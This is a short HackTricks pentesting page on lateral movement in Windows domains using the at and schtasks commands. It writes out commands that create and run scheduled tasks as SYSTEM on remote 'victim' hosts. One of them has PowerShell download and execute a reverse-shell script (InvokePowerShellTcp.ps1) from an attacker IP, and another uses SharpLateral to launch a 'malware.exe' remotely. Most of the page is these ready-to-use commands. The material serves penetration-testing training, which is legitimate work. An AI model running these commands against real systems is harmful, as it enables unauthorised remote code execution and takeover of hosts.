Search K
Appearance
Appearance
Other ways to support HackTricks:
At allows to schedule tasks in hosts where you know username/(password/Hash). So, you can use it to execute commands in other hosts and get the output.
At \\victim 11:00:00PM shutdown -r
Using schtasks you need first to create the task and then call it:
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
You can also use SharpLateral:
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
More information about the use of schtasks with silver tickets here.
Other ways to support HackTricks: